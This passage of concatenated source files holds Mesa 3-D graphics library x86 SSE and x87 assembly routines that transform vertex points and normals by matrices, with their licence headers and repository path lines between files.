HIDDEN(_mesa_sse_transform_points1_perspective)
GLNAME(_mesa_sse_transform_points1_perspective):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13PR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
XORPS( XMM0, XMM0 ) /* 0 | 0 | 0 | 0 */
MOVSS( M(0), XMM1 ) /* m0 */
MOVSS( M(14), XMM2 ) /* m14 */
ALIGNTEXT32
LLBL(K_GTP13PR_top):
MOVSS( S(0), XMM3 ) /* ox */
MULSS( XMM1, XMM3 ) /* ox*m0 */
MOVSS( XMM3, D(0) ) /* ox*m0->D(0) */
MOVSS( XMM2, D(2) ) /* m14->D(2) */
MOVSS( XMM0, D(1) )
MOVSS( XMM0, D(3) )
LLBL(K_GTP13PR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP13PR_top) )
LLBL(K_GTP13PR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_2d)
HIDDEN(_mesa_sse_transform_points1_2d)
GLNAME(_mesa_sse_transform_points1_2d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13P2DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVLPS( M(0), XMM0 ) /* m1 | m0 */
MOVLPS( M(12), XMM1 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP13P2DR_top):
MOVSS( S(0), XMM2 ) /* ox */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM2 ) /* - | - | ox*m1 | ox*m0 */
ADDPS( XMM1, XMM2 ) /* - | - | ox*m1+m13 | ox*m0+m12 */
MOVLPS( XMM2, D(0) )
LLBL(K_GTP13P2DR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP13P2DR_top) )
LLBL(K_GTP13P2DR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_2d_no_rot)
HIDDEN(_mesa_sse_transform_points1_2d_no_rot)
GLNAME(_mesa_sse_transform_points1_2d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13P2DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS( M(0), XMM0 ) /* m0 */
MOVSS( M(12), XMM1 ) /* m12 */
MOVSS( M(13), XMM2 ) /* m13 */
ALIGNTEXT32
LLBL(K_GTP13P2DNRR_top):
MOVSS( S(0), XMM3 ) /* ox */
MULSS( XMM0, XMM3 ) /* ox*m0 */
ADDSS( XMM1, XMM3 ) /* ox*m0+m12 */
MOVSS( XMM3, D(0) )
MOVSS( XMM2, D(1) )
LLBL(K_GTP13P2DNRR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP13P2DNRR_top) )
LLBL(K_GTP13P2DNRR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points1_3d)
HIDDEN(_mesa_sse_transform_points1_3d)
GLNAME(_mesa_sse_transform_points1_3d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP13P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVAPS( M(0), XMM0 ) /* m3 | m2 | m1 | m0 */
MOVAPS( M(12), XMM1 ) /* m15 | m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP13P3DR_top):
MOVSS( S(0), XMM2 ) /* ox */
SHUFPS( CONST(0x0), XMM2, XMM2 ) /* ox | ox | ox | ox */
MULPS( XMM0, XMM2 ) /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
ADDPS( XMM1, XMM2 ) /* +m15 | +m14 | +m13 | +m12 */
MOVLPS( XMM2, D(0) ) /* - | - | ->D(1)| ->D(0)*/
UNPCKHPS( XMM2, XMM2 ) /* ox*m3+m15 | ox*m3+m15 | ox*m2+m14 | ox*m2+m14 */
MOVSS( XMM2, D(2) )
LLBL(K_GTP13P3DR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP13P3DR_top) )
LLBL(K_GTP13P3DR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 7,745
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_normal.S
|
/* $Id: sse_normal.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "norm_args.h"
SEG_TEXT
#define M(i) REGOFF(i * 4, EDX)
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define STRIDE REGOFF(12, ESI)
ALIGNTEXT16
GLOBL GLNAME(_mesa_sse_transform_rescale_normals_no_rot)
HIDDEN(_mesa_sse_transform_rescale_normals_no_rot)
GLNAME(_mesa_sse_transform_rescale_normals_no_rot):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L ( ARG_IN, ESI ) /* ptr to source GLvector3f */
MOV_L ( ARG_DEST, EDI ) /* ptr to dest GLvector3f */
MOV_L ( ARG_MAT, EDX ) /* ptr to matrix */
MOV_L ( REGOFF(MATRIX_INV, EDX), EDX) /* matrix->inv */
MOV_L ( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L ( ECX, ECX )
JZ( LLBL(K_G3TRNNRR_finish) ) /* count was zero; go to finish */
MOV_L ( STRIDE, EAX ) /* stride */
MOV_L ( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest-count */
IMUL_L( CONST(16), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM1 ) /* m0 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS( XMM2, XMM1 ) /* m5 | m0 */
MOVSS ( ARG_SCALE, XMM0 ) /* scale */
SHUFPS ( CONST(0x0), XMM0, XMM0 ) /* scale | scale */
MULPS ( XMM0, XMM1 ) /* m5*scale | m0*scale */
MULSS ( M(10), XMM0 ) /* m10*scale */
ALIGNTEXT32
LLBL(K_G3TRNNRR_top):
MOVLPS ( S(0), XMM2 ) /* uy | ux */
MULPS ( XMM1, XMM2 ) /* uy*m5*scale | ux*m0*scale */
MOVLPS ( XMM2, D(0) ) /* ->D(1) | D(0) */
MOVSS ( S(2), XMM2 ) /* uz */
MULSS ( XMM0, XMM2 ) /* uz*m10*scale */
MOVSS ( XMM2, D(2) ) /* ->D(2) */
LLBL(K_G3TRNNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_G3TRNNRR_top) )
LLBL(K_G3TRNNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME(_mesa_sse_transform_rescale_normals)
HIDDEN(_mesa_sse_transform_rescale_normals)
GLNAME(_mesa_sse_transform_rescale_normals):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L ( ARG_IN, ESI ) /* ptr to source GLvector3f */
MOV_L ( ARG_DEST, EDI ) /* ptr to dest GLvector3f */
MOV_L ( ARG_MAT, EDX ) /* ptr to matrix */
MOV_L ( REGOFF(MATRIX_INV, EDX), EDX) /* matrix->inv */
MOV_L ( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L ( ECX, ECX )
JZ( LLBL(K_G3TRNR_finish) ) /* count was zero; go to finish */
MOV_L ( STRIDE, EAX ) /* stride */
MOV_L ( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest-count */
IMUL_L( CONST(16), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS ( M(0), XMM0 ) /* m0 */
MOVSS ( M(4), XMM1 ) /* m4 */
UNPCKLPS( XMM1, XMM0 ) /* m4 | m0 */
MOVSS ( ARG_SCALE, XMM4 ) /* scale */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* scale | scale */
MULPS ( XMM4, XMM0 ) /* m4*scale | m0*scale */
MOVSS ( M(1), XMM1 ) /* m1 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS( XMM2, XMM1 ) /* m5 | m1 */
MULPS ( XMM4, XMM1 ) /* m5*scale | m1*scale */
MOVSS ( M(2), XMM2 ) /* m2 */
MOVSS ( M(6), XMM3 ) /* m6 */
UNPCKLPS( XMM3, XMM2 ) /* m6 | m2 */
MULPS ( XMM4, XMM2 ) /* m6*scale | m2*scale */
MOVSS ( M(8), XMM6 ) /* m8 */
MULSS ( ARG_SCALE, XMM6 ) /* m8*scale */
MOVSS ( M(9), XMM7 ) /* m9 */
MULSS ( ARG_SCALE, XMM7 ) /* m9*scale */
ALIGNTEXT32
LLBL(K_G3TRNR_top):
MOVSS ( S(0), XMM3 ) /* ux */
SHUFPS ( CONST(0x0), XMM3, XMM3 ) /* ux | ux */
MULPS ( XMM0, XMM3 ) /* ux*m4 | ux*m0 */
MOVSS ( S(1), XMM4 ) /* uy */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* uy | uy */
MULPS ( XMM1, XMM4 ) /* uy*m5 | uy*m1 */
MOVSS ( S(2), XMM5 ) /* uz */
SHUFPS ( CONST(0x0), XMM5, XMM5 ) /* uz | uz */
MULPS ( XMM2, XMM5 ) /* uz*m6 | uz*m2 */
ADDPS ( XMM4, XMM3 )
ADDPS ( XMM5, XMM3 )
MOVLPS ( XMM3, D(0) )
MOVSS ( M(10), XMM3 ) /* m10 */
MULSS ( ARG_SCALE, XMM3 ) /* m10*scale */
MULSS ( S(2), XMM3 ) /* m10*scale*uz */
MOVSS ( S(1), XMM4 ) /* uy */
MULSS ( XMM7, XMM4 ) /* uy*m9*scale */
MOVSS ( S(0), XMM5 ) /* ux */
MULSS ( XMM6, XMM5 ) /* ux*m8*scale */
ADDSS ( XMM4, XMM3 )
ADDSS ( XMM5, XMM3 )
MOVSS ( XMM3, D(2) )
LLBL(K_G3TRNR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_G3TRNR_top) )
LLBL(K_G3TRNR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME(_mesa_sse_transform_normals_no_rot)
HIDDEN(_mesa_sse_transform_normals_no_rot)
GLNAME(_mesa_sse_transform_normals_no_rot):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L ( ARG_IN, ESI ) /* ptr to source GLvector3f */
MOV_L ( ARG_DEST, EDI ) /* ptr to dest GLvector3f */
MOV_L ( ARG_MAT, EDX ) /* ptr to matrix */
MOV_L ( REGOFF(MATRIX_INV, EDX), EDX) /* matrix->inv */
MOV_L ( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L ( ECX, ECX )
JZ( LLBL(K_G3TNNRR_finish) ) /* count was zero; go to finish */
MOV_L ( STRIDE, EAX ) /* stride */
MOV_L ( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest-count */
IMUL_L( CONST(16), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
MOVSS( M(0), XMM0 ) /* m0 */
MOVSS( M(5), XMM1 ) /* m5 */
UNPCKLPS( XMM1, XMM0 ) /* m5 | m0 */
MOVSS( M(10), XMM1 ) /* m10 */
ALIGNTEXT32
LLBL(K_G3TNNRR_top):
MOVLPS( S(0), XMM2 ) /* uy | ux */
MULPS( XMM0, XMM2 ) /* uy*m5 | ux*m0 */
MOVLPS( XMM2, D(0) )
MOVSS( S(2), XMM2 ) /* uz */
MULSS( XMM1, XMM2 ) /* uz*m10 */
MOVSS( XMM2, D(2) )
LLBL(K_G3TNNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_G3TNNRR_top) )
LLBL(K_G3TNNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 12,068
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_xform2.S
|
/* $Id: x86_xform2.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FP_ONE 1065353216
#define FP_ZERO 0
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
#define MAT4 REGOFF(16, EDX)
#define MAT5 REGOFF(20, EDX)
#define MAT6 REGOFF(24, EDX)
#define MAT7 REGOFF(28, EDX)
#define MAT8 REGOFF(32, EDX)
#define MAT9 REGOFF(36, EDX)
#define MAT10 REGOFF(40, EDX)
#define MAT11 REGOFF(44, EDX)
#define MAT12 REGOFF(48, EDX)
#define MAT13 REGOFF(52, EDX)
#define MAT14 REGOFF(56, EDX)
#define MAT15 REGOFF(60, EDX)
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_general )
HIDDEN(_mesa_x86_transform_points2_general)
GLNAME( _mesa_x86_transform_points2_general ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_gr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_gr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC0 ) /* F7 F6 F5 F4 */
FMUL_S( MAT3 )
FLD_S( SRC1 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT6 )
FLD_S( SRC1 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT7 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FXCH( ST(3) ) /* F4 F6 F5 F7 */
FADD_S( MAT12 )
FXCH( ST(2) ) /* F5 F6 F4 F7 */
FADD_S( MAT13 )
FXCH( ST(1) ) /* F6 F5 F4 F7 */
FADD_S( MAT14 )
FXCH( ST(3) ) /* F7 F5 F4 F6 */
FADD_S( MAT15 )
FXCH( ST(2) ) /* F4 F5 F7 F6 */
FSTP_S( DST0 ) /* F5 F7 F6 */
FSTP_S( DST1 ) /* F7 F6 */
FXCH( ST(1) ) /* F6 F7 */
FSTP_S( DST2 ) /* F7 */
FSTP_S( DST3 ) /* */
LLBL(x86_p2_gr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_gr_loop) )
LLBL(x86_p2_gr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_perspective )
HIDDEN(_mesa_x86_transform_points2_perspective)
GLNAME( _mesa_x86_transform_points2_perspective ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_pr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
MOV_L( MAT14, EBX )
ALIGNTEXT16
LLBL(x86_p2_pr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FSTP_S( DST0 ) /* F1 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
MOV_L( CONST(FP_ZERO), DST3 )
LLBL(x86_p2_pr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_pr_loop) )
LLBL(x86_p2_pr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_3d )
HIDDEN(_mesa_x86_transform_points2_3d)
GLNAME( _mesa_x86_transform_points2_3d ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_3dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_3dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC1 ) /* F0 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT6 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
FXCH( ST(2) ) /* F4 F5 F6 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 F6 */
FADD_S( MAT13 )
FXCH( ST(2) ) /* F6 F4 F5 */
FADD_S( MAT14 )
FXCH( ST(1) ) /* F4 F6 F5 */
FSTP_S( DST0 ) /* F6 F5 */
FXCH( ST(1) ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
LLBL(x86_p2_3dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_3dr_loop) )
LLBL(x86_p2_3dr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_3d_no_rot )
HIDDEN(_mesa_x86_transform_points2_3d_no_rot)
GLNAME( _mesa_x86_transform_points2_3d_no_rot ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_3dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
MOV_L( MAT14, EBX )
ALIGNTEXT16
LLBL(x86_p2_3dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 */
